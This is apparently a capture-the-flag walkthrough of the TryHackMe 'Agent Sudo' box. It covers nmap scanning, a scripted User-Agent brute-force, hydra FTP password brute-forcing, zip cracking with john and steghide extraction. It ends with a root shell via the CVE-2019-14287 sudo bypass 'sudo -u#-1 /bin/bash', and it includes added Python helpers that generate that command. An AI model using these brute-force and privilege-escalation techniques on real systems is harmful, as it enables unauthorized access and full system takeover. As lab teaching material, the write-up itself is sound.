[THM] Agent Sudo

Updated on 2026-03-30 · 5896 words

Enumeration

Open ports

```
nmap -sV -sC -v -Pn 10.49.189.131

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_ 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Annoucement
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

Getting into the hidden page

The site hints that you can only get in by sending an agent codename as the User-Agent header.

Taking the R from the hint as the model, the other codenames are presumably single uppercase letters too, so capture the request and brute-force the User-Agent header over A to Z; the request sent with C comes back as a 302 redirect.

Visiting the page with User-Agent C reveals that the username is chris.
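The User-Agent brute-force above can be scripted instead of replayed through a proxy. The following Python is an added example, not code from the original writeup: it starts a local stand-in server that mimics the gate (it accepts only the codename C and redirects to a hypothetical path; both values are assumptions, not the real box), disables redirect-following so the 302 stays visible, and probes every uppercase letter. Point `find_gate_codenames` at a real base URL to use it against a target.

```python
"""Brute-force a User-Agent gated page and report which agents get redirected.

Added example (not from the original writeup). The target below is a local
stand-in server constructed for this demo: only the codename "C" is accepted
and it redirects to a hypothetical path. Both values are assumptions.
"""
import string
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

ACCEPTED_AGENT = "C"                         # assumed gate value
REDIRECT_TARGET = "/agent_C_attention.php"   # hypothetical path


class GateHandler(BaseHTTPRequestHandler):
    """Stand-in for the announcement page: 302 for the right codename, 200 otherwise."""

    def do_GET(self):
        if self.headers.get("User-Agent", "") == ACCEPTED_AGENT:
            self.send_response(302)
            self.send_header("Location", REDIRECT_TARGET)
            self.end_headers()
            return
        body = b"Use your codename as user-agent to access the site\n"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *_):  # silence per-request logging
        pass


def start_stand_in_server():
    """Serve GateHandler on a free loopback port; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), GateHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}/"


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Make urllib raise HTTPError on 3xx instead of silently following it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe_user_agents(url, candidates):
    """Return {ua: (status, Location header or None)} for each candidate User-Agent."""
    opener = urllib.request.build_opener(NoRedirect)
    results = {}
    for ua in candidates:
        req = urllib.request.Request(url, headers={"User-Agent": ua})
        try:
            with opener.open(req, timeout=5) as resp:
                results[ua] = (resp.status, resp.headers.get("Location"))
        except urllib.error.HTTPError as err:       # 3xx/4xx/5xx land here
            results[ua] = (err.code, err.headers.get("Location"))
    return results


def find_gate_codenames(url, candidates=string.ascii_uppercase):
    """Codenames that the gate answers with a redirect, mapped to the Location."""
    return {
        ua: location
        for ua, (status, location) in probe_user_agents(url, candidates).items()
        if status in (301, 302, 303, 307, 308)
    }


if __name__ == "__main__":
    server, base = start_stand_in_server()
    print(find_gate_codenames(base))              # {'C': '/agent_C_attention.php'}
    server.shutdown()
```

The redirect handler override matters: with the default opener urllib would follow the 302 and you would only see the final 200, which is exactly why the Location header and status are recorded per candidate rather than the body.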

Hash cracking

FTP service probing

Anonymous login is not allowed, so the only option is to brute-force a password for the chris user found earlier and see whether it gets us in.

hydra finds the password: crystal

Logging in over FTP shows three files; download them to the local machine with get.

```
ftp 10.49.189.131
Connected to 10.49.189.131.
220 (vsFTPd 3.0.3)
Name (10.49.189.131:kali): chris

331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||27560|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
226 Directory send OK.
ftp> get To_agentJ.txt
local: To_agentJ.txt remote: To_agentJ.txt
229 Entering Extended Passive Mode (|||62279|)
150 Opening BINARY mode data connection for To_agentJ.txt (217 bytes).
100% |***********************************************************************************************************************************************************************| 217 103.42 KiB/s 00:00 ETA
226 Transfer complete.
217 bytes received in 00:00 (0.92 KiB/s)
ftp> get cut
cute-alien.jpg cutie.png
ftp> get cute-alien.jpg
local: cute-alien.jpg remote: cute-alien.jpg
229 Entering Extended Passive Mode (|||19041|)
150 Opening BINARY mode data connection for cute-alien.jpg (33143 bytes).
100% |***********************************************************************************************************************************************************************| 33143 69.82 KiB/s 00:00 ETA
226 Transfer complete.
33143 bytes received in 00:00 (47.27 KiB/s)
ftp> get cutie.png
local: cutie.png remote: cutie.png
229 Entering Extended Passive Mode (|||40413|)
150 Opening BINARY mode data connection for cutie.png (34842 bytes).
100% |***********************************************************************************************************************************************************************| 34842 75.59 KiB/s 00:00 ETA
226 Transfer complete.
34842 bytes received in 00:00 (50.50 KiB/s)
ftp> exit
221 Goodbye.
```

Image steganography

Suspecting that the images carry embedded files, analyze them with binwalk.

```
binwalk cute-alien.jpg

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01

binwalk cutie.png

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 528 x 528, 8-bit colormap, non-interlaced
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820 0x8804 End of Zip archive, footer length: 22
```

cutie.png has a zip archive appended after the image data; extract it with binwalk -e cutie.png (binwalk names the carved file after its hex offset, 8702.zip).
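What binwalk -e does here can be reproduced by hand: walk the PNG chunks to the IEND chunk, look for a ZIP local-file header after it, and cut at the end-of-central-directory record. The Python below is an added example rather than the page's tooling; the PNG-plus-ZIP input it parses is constructed inline (an unencrypted archive, unlike the one on the box) so it runs offline. Even for an encrypted archive the member names and sizes are readable from the central directory, which is why binwalk could print To_agentR.txt without knowing the password.

```python
"""Carve a ZIP archive appended after a PNG's IEND chunk.

Added example (not from the original writeup). The PNG-with-trailing-ZIP
sample is constructed below so the carver can be exercised offline.
"""
import io
import struct
import zipfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
ZIP_LOCAL_HEADER = b"PK\x03\x04"
ZIP_EOCD = b"PK\x05\x06"          # end-of-central-directory signature


def png_end_offset(data):
    """Walk PNG chunks (length, type, data, CRC) and return the offset just past IEND."""
    if not data.startswith(PNG_SIG):
        return None
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4        # header + payload + CRC
        if ctype == b"IEND":
            return pos
    return None


def carve_zip(data):
    """Return (offset, zip_bytes) for a ZIP found after the PNG, or (None, None)."""
    start = png_end_offset(data)
    if start is None:
        return None, None
    begin = data.find(ZIP_LOCAL_HEADER, start)
    eocd = data.rfind(ZIP_EOCD)
    if begin == -1 or eocd < begin or eocd + 22 > len(data):
        return None, None
    # EOCD is 22 bytes; the optional archive comment length sits at bytes 20..22
    comment_len = struct.unpack("<H", data[eocd + 20:eocd + 22])[0]
    return begin, data[begin:eocd + 22 + comment_len]


def describe_zip(zip_bytes):
    """Member name, sizes and encryption flag (general-purpose bit 0) per entry."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        return [
            {
                "name": info.filename,
                "compressed": info.compress_size,
                "uncompressed": info.file_size,
                "encrypted": bool(info.flag_bits & 0x1),
            }
            for info in archive.infolist()
        ]


def build_sample_png_with_zip(member="To_agentR.txt", content=b"constructed sample text"):
    """Constructed input: a minimal 1x1 grayscale PNG followed by a small ZIP."""
    def chunk(ctype, body):
        crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, 8-bit, colour type 0
    idat = zlib.compress(b"\x00\x00")                     # filter byte + one pixel
    png = PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr(member, content)
    return png + buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_png_with_zip()
    offset, blob = carve_zip(sample)
    print(hex(offset), describe_zip(blob))
```

Searching only after IEND avoids false hits on "PK" byte pairs inside the compressed IDAT stream; cutting at the EOCD record (plus any comment) keeps the central directory intact, which is what zipfile and 7z need to list the entries.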

unzip refuses the archive because it needs a newer PKZIP version than it supports; 7z x 8702.zip handles it but prompts for a password, so crack that with john.

```
zip2john 8702.zip > zip_hash.txt

john zip_hash.txt

Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x])
Cost 1 (HMAC size) is 78 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
alien (8702.zip/To_agentR.txt)
1g 0:00:00:00 DONE 2/3 (2026-03-29 22:27) 1.234g/s 54869p/s 54869c/s 54869C/s 123456..Peter
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

The extracted archive holds a single txt file:

```
Agent C,

We need to send the picture to 'QXJlYTUx' as soon as possible!

By,
Agent R
```

QXJlYTUx looks like an encoded string (the alphabet and the length, a multiple of four, point to base64); decoding it in CyberChef gives Area51.
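Rather than guessing which CyberChef recipe to try, a small helper can run the usual text encodings over a token and keep only the decodings that come out as printable text. This is an added example, not part of the original writeup; the decoders are limited to the standard-library ones.

```python
"""Try common text encodings on a short token and keep the decodings that look like text.

Added example (not from the original writeup).
"""
import base64
import binascii
import string

_PRINTABLE = set(string.printable) - set("\x0b\x0c")


def _as_text(raw):
    """Return the bytes as a str if they are printable ASCII, else None."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text and all(ch in _PRINTABLE for ch in text) else None


def _b64url(token):
    # URL-safe base64 is often written without padding; restore it before decoding
    return base64.urlsafe_b64decode(token + "=" * (-len(token) % 4))


DECODERS = {
    "base64": lambda t: base64.b64decode(t, validate=True),
    "base64url": _b64url,
    "base32": lambda t: base64.b32decode(t, casefold=True),
    "hex": bytes.fromhex,
}


def candidate_decodings(token):
    """{encoding: decoded text} for each decoder that accepts the token and yields printable ASCII."""
    token = token.strip()
    found = {}
    for name, decode in DECODERS.items():
        try:
            text = _as_text(decode(token))
        except (binascii.Error, ValueError):   # wrong alphabet, length or padding
            continue
        if text is not None:
            found[name] = text
    return found


if __name__ == "__main__":
    print(candidate_decodings("QXJlYTUx"))   # base64 and base64url both give 'Area51'
```

The printable-ASCII filter is what makes this useful: base32 also accepts QXJlYTUx as input but produces bytes that are clearly not text, so it is dropped and only the base64 interpretation survives.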

For the other image, steghide reports embedded data that needs a passphrase; the Area51 obtained above unlocks it.

Alternatively, a tool can brute-force the passphrase directly:

```
stegseek cute-alien.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "Area51"
[i] Original filename: "message.txt".
[i] Extracting to "cute-alien.jpg.out".
```

The extracted file gives an account and its password:

```
cat cute-alien.jpg.out
Hi james,

Glad you find this message. Your login password is hackerrules!

Don't ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,
chris
```

Getting the user flag

Log in over SSH as james with that password; once we have a foothold, the user flag sits in the home directory.

The home directory also holds a jpg; copy it to our machine with scp.

A Google reverse image search (or any other reverse lookup tool) identifies the picture as Roswell alien autopsy.

Privilege escalation

```
sudo -l

[sudo] password for james:
Matching Defaults entries for james on agent-sudo:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on agent-sudo:
(ALL, !root) /bin/bash
```

The entry (ALL, !root) /bin/bash is an odd sudo rule: james may run /bin/bash through sudo as any user except root.

A quick search turns up the matching sudo bug, CVE-2019-14287, which affects sudo versions before 1.8.28 whenever the Runas spec allows ALL but excludes root like this.

With it, sudo -u#-1 /bin/bash gives a root shell: the policy check accepts uid -1 because it is not root, but setresuid() treats -1 as "leave unchanged", so the shell keeps sudo's uid 0. From there the root flag is readable.
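The triage of the sudo -l output and the sudo version can be scripted; the Python below is an added example, not the page's exploit. It parses the Runas spec, flags (ALL, !root)-style rules, compares the sudo version against 1.8.28 (the release that fixed CVE-2019-14287), produces the -u#-1 command for each matching rule, and models why the trick works: the policy check sees uid -1 as "not root", but setresuid() treats -1 as "leave unchanged", so a process already running as uid 0 stays uid 0. The sudo -l sample is copied from the listing above; the version banner is an assumed value (run sudo -V on the target).

```python
"""Triage `sudo -l` output for the Runas pattern exploited by CVE-2019-14287.

Added example (not from the original writeup). The sudo -l sample is copied
from the listing on this page; the version banner is an assumed value.
"""
import re

FIXED_VERSION = (1, 8, 28)   # sudo 1.8.28 rejects -u#-1; older releases are exposed

# "(runas_users[:runas_groups]) [TAG: ...] command"
_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_version(banner):
    """'Sudo version 1.8.21p2' -> (1, 8, 21); the pN patch suffix is ignored."""
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", banner)
    if not match:
        raise ValueError("no version number in banner")
    return tuple(int(part) for part in match.groups())


def version_vulnerable(version):
    return tuple(version) < FIXED_VERSION


def parse_runas_rules(sudo_l_output):
    """[(runas_users, runas_groups, command)] from the 'may run the following' section."""
    rules, in_rules = [], False
    for line in sudo_l_output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        match = _RULE_RE.match(line) if in_rules else None
        if not match:
            continue
        users, _, groups = match.group("runas").partition(":")
        rules.append((
            [u.strip() for u in users.split(",") if u.strip()],
            [g.strip() for g in groups.split(",") if g.strip()],
            match.group("cmd").strip(),
        ))
    return rules


def all_but_root_rules(rules):
    """Rules granting ALL runas users while excluding root by name or by uid (#0)."""
    return [r for r in rules if "ALL" in r[0] and any(u in ("!root", "!#0") for u in r[0])]


def exploit_commands(rules):
    """The -u#-1 invocation for each matching rule (-u#4294967295 is equivalent)."""
    return [f"sudo -u#-1 {cmd}" for _, _, cmd in all_but_root_rules(rules)]


def uid_after_setresuid(current_uid, requested_uid):
    """Model of the kernel semantics behind the bug.

    setresuid() treats -1 (0xFFFFFFFF as unsigned) as 'leave this id unchanged'.
    sudo's policy check lets -1 through because it is not root, and sudo itself
    is already running with uid 0, so the 'change' keeps uid 0.
    """
    if requested_uid in (-1, 0xFFFFFFFF):
        return current_uid
    return requested_uid


SAMPLE_SUDO_L = """\
Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass
User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash
"""
SAMPLE_BANNER = "Sudo version 1.8.21p2"   # assumed value; check with `sudo -V` on the target


if __name__ == "__main__":
    rules = parse_runas_rules(SAMPLE_SUDO_L)
    if version_vulnerable(parse_sudo_version(SAMPLE_BANNER)):
        for cmd in exploit_commands(rules):
            print(cmd)                       # sudo -u#-1 /bin/bash
```

The version gate is the check worth keeping in a real triage script: on sudo 1.8.28 or later the same rule is still a misconfiguration worth reporting, but -u#-1 is rejected and the exploit command should not be suggested.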

The final bonus question is answered at the bottom of the root flag file: DesKel is Agent R.

```
By,
DesKel a.k.a Agent R
```

Summary

  • Password cracking, steghide-hidden data in images, and binwalk extraction of an embedded zip
  • FTP brute-forcing with hydra
  • Privilege escalation through a known sudo CVE